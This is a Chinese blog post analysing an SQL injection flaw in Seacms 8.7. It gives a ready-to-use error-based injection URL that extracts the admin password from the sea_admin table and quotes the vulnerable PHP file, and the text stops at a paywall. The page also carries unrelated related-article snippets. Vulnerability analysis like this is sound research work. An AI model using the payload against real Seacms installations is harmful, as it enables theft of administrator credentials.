网络安全- 实战篇 技能提升丨Seacms 8.7版本SQL注入分析

最新推荐文章于 2024-07-19 02:25:25 发布
最新推荐文章于 2024-07-19 02:25:25 发布
阅读量531 收藏 3
点赞数
分类专栏: 安全开发 实战篇 文章标签: 网络安全 技能提升 SQL注入分析 Seacms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90703946
版权

有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。
在这里插入图片描述
0x01环境

Web:phpstudy and MAMP
System:Windows 7 X64 and MacOS
Browser:Firefox Quantum and Chrome
MySQL:5.5
php:5.4

0x02漏洞详情

漏洞复现

payload:

http://10.211.55.4/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

在这里插入图片描述
漏洞分析

之前在MySQL 5.6、5.7上面复现都不成功,因为这两个版本用extractvalue( )、updatexml( )报错注入不成功,后来换了系统Linux和Windows还有macOS来测试也是一样,和PHP、Apache的版本没有影响,还是MySQL的版本问题,所以大家测试的时候注意一下版本。

漏洞文件是在:comment/api/index.php

<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{
 if(file_exists($jsoncachefile))
 {
 $json=LoadFile($jsoncachefile);
 die($json);
 }
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
 createTextFile($h,$jsoncachefile);
}
die($h); 
function ReadData($id,$page)
{
 global $type,
最低0.47元/天 解锁文章
Coisini、
关注
专栏目录
sql中return的用法,在C#中调用带有return值的存储过程
12-18
结构化查询语言sql中return的用法,在C#中调用带有return值的存储过程
gradle-8.7-bin
05-13
2、gradle-8.7-bin 3、gradle--8.7 4、什么是Gradle? Gradle是一个开源构建自动化工具,专为大型项目设计。它基于DSL(领域特定语言)编写,该语言是用Groovy编写的,使得构建脚本更加简洁和强大。Gradle不仅可以...
技能提升Seacms 8.7版本SQL注入分析
dfdhxb995397的博客
04-02 340
有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。 0x01环境 Web:phpstudy and MAMP System:Windows 7 X64 and MacOS Browser...
SQL 流程控制语句 之五 RETURN语句介绍
对象本无根,类型亦无形。本来无一物,何处惹尘埃
07-10 1908
SQL 流程控制语句 之五 RETURN语句介绍 一、RETURN语句例子:  WAITFOR delay 00:00:01 Select * from titlesreturnselect * from publishers 二、RETURN语句  语法RETURN语句用于无条件地终止一个查询、存储过程或者批处理,此时位于RETURN语句之后的程序将不会被
sql 将字符串转换为日期
最新发布
weixin_41292640的博客
07-19 2295
在 SQL 中,将字符串转换为日期(或时间戳)是一个常见的需求,这通常涉及到使用特定的日期函数或转换函数,具体取决于你使用的数据库系统。以下是在一些流行的数据库系统中将字符串转换为日期的示例:MySQL:使用STR_TO_DATE函数。登录后复制 SELECT STR_TO_DATE('2023-10-23', '%...
String转换sql.Date和sql.Time
weixin_45920385的博客
11-21 2439
String转换sql.Date和sql.Time String类型转换成java.sql.Date类型不能直接进行转换,首先要将String转换成java.util.Date,在转化成java.sql.Date public static java.sql.Date strToDate(String str) throws ParseException { SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd"); /
Gradle-8.7-all最新版安装压缩包
03-30
1.1 什么是Gradle? Gradle是一个开源构建自动化工具,专为大型项目设计。它基于DSL(领域特定语言)编写,该语言是用Groovy编写的,使得构建脚本更加简洁和强大。Gradle不仅可以构建Java应用程序,还支持多种语言和...
2k3-missing-x86fre-v8.7z
11-11
标题“2k3-missing-x86fre-v8.7z”表明这可能是一个与Windows 2003 Server相关的修复或更新包,专为32位(x86)系统设计,版本号为v8。7z文件是7-Zip压缩格式,通常用于存储多个文件或文件夹以节省磁盘空间。 描述...
cudnn-windows-x86-64-8.7.0.84-cuda10-archive.zip
03-30
cuDNN v8.7.0, 对应Windows10, CUDA 10.2。 cuDNN v8.7.0 (November 28th, 2022), for CUDA 10.2, Windows 10。
将string类型的时间转换成SQL date 型
沉睡的鱼
01-16 1232
[size=medium][color=indigo]// 将string类型的时间转换成SQL date 型 public Date dateChange(String date1) { SimpleDateFormat sdf =new SimpleDateFormat("yyyy-MM-dd"); java.util.Date cDate; Date...
海洋CMS 影视管理系统
09-26
海洋CMS 影视管理系统,海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP+MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。
sql的date和string转换
weixin_34075268的博客
03-27 3095
涉及的函数 date_format(date, format) 函数,MySQL日期格式化函数date_format() unix_timestamp() 函数 str_to_date(str, format) 函数 from_unixtime(unix_timestamp, format) 函数,MySQL时间戳格式化函数from_unixtime 时间转字符串 ...
Mssql中Return的用法
weixin_30362801的博客
02-12 368
实际上,无论是否指定返回值,程序都会返回一个值。默认时,在存储过程完成时,SQL Service会自动返回一个值0. 要从存储过程向调用它的代码返回值,可以简单的使用return语句 return[<返回整数值>] 注意返回值一定是整数 关于return语句,也许我们最了解的就是它在存储过程中无条件的退出。无论在存储过程中的什么位置,只要调用return语句,其后的所有代码都不...
sql return的用法_MyBatis XML方式的基本用法之增删改
weixin_39582656的博客
12-01 185
# insert用法1 简单的insert方法假如现在我们想新增一个用户,该如何操作呢?首先,在接口SysUserMapper中添加如下方法。/** * 新增用户 * * @param sysUser * @return */int insert(SysUser sysUser);然后打开对应的SysUserMapper.xml文件,添加如下语句。<insert id="inser...
sql中return和returns的区别
weixin_30783629的博客
07-10 4010
用户定义函数中,用RETURNS 子句指定该函数返回值的数据类型 return用于返回具体的值/值变量 转载于:https://www.cnblogs.com/lfq2011/archive/2009/05/15/1457646.html...
C#获得sql存储过程return返回的值和返回参数返回的值
nutian的专栏
10-30 6292
下面的CmdObj.是定义的SqlCommand对象1、获得存储过程中return语句返回的整个存储过程函数的返回值://获得存储过程return的值,定义一个参数,指明其作用是接受return的值    CmdObj.Parameters.Add("RETURN_VALUE", SqlDbType.Int).Direction =ParameterDirection.ReturnValu
sql中return/break/continue解释
wozengcong的专栏
05-12 4157
sql中return/break/continue解释 2016-07-20 11:12:28 一,return:从查询或过程中无条件退出。可在任何时候用于从过程、批处理或语句块中退出。RETURN 之后的语句是不执行的。 1,如果用于存储过程,RETURN 不能返回空值。如果强制返回则:将生成警告消息并返回 0 值。 2,RETURN 语句无条件终止查询、存储过程或批处理。存储过程或批处理中 RETURN 语句后面的语句都不执行。 二,break:退出 WHILE 或 I...
SQL server 中 return,break和continue的使用及例子
热门推荐
数据分析
05-06 1万+
1、continue: 重新开始 WHILE 循环。在 CONTINUE 关键字之后的任何语句都将被忽略。 例子:计算1-10的偶数和 DECLARE @SUM INT, @I INT SET @SUM=0 SET @I =1 WHILE (@I &lt;=10) BEGIN IF (@I % 2 =1) BEGIN ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值